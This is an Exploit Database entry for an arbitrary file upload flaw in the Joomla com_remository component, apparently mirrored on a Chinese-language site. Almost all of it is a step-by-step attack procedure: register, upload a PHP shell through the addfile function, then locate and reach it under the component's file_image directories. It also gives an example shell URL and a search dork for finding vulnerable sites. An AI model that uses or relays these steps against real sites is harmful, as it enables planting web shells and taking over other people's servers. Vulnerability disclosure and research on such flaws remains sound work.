Joomla! Component com_remository – Arbitrary File Upload

• Exploit Database
• 107 阅读

• 作者： J3yk0ob
  日期： 2010-08-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14811/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  ################################################################# # I N F O # # Exploit Title: Joomla com_remository Remote Upload File # Date: 2010-08-26 # Author: J3yk0ob # Home: http://www.J3yk0ob.com # ################################################################# #E X P L O I T # #1. Register On Site # #2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile # #3. Add your php file , example : shell.php # #4. http://www.Target.com/components/com_remository_files/ # #5. If web server alowe to see directory you can see folder example : file_image_2 # #6. You can find your shell in lates file_image_[latest Number] # #7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php # #Dork : inurl:"index.php?com_remository" # ################################################################# # Contact Me # # Home : http://www.J3yk0ob.com # Email : 4dm1n@J3yk0ob.com # ##################################################################